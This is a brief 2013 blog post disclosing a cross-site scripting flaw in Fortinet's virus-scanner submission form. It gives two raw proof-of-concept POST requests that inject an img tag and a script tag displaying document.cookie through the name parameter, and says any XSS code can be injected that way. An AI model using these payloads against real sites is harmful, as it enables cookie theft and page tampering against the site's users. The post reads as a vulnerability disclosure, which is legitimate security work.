This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
18.97.9.171.US.SSL

Fortiguard.com virus scanner submission form XSS bug

Vulnerable page: https://submission.fortinet.com/ @ http://www.fortiguard.com/

PoC
POST /scanner.php HTTP/1.1
Host: submission.fortinet.com
name="><img src=http://te-home.net/images/logo.png>

POST /scanner.php HTTP/1.1
Host: submission.fortinet.com
name="><script>alert(document.cookie)</script>

You can either include any XSS code in name input box, or request any XSS code directly using POST method and name parameter.

Image tag
Script tag


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2013-11-28 08:39 0 likes

Comments

There are no comments for this news article, you can leave one here.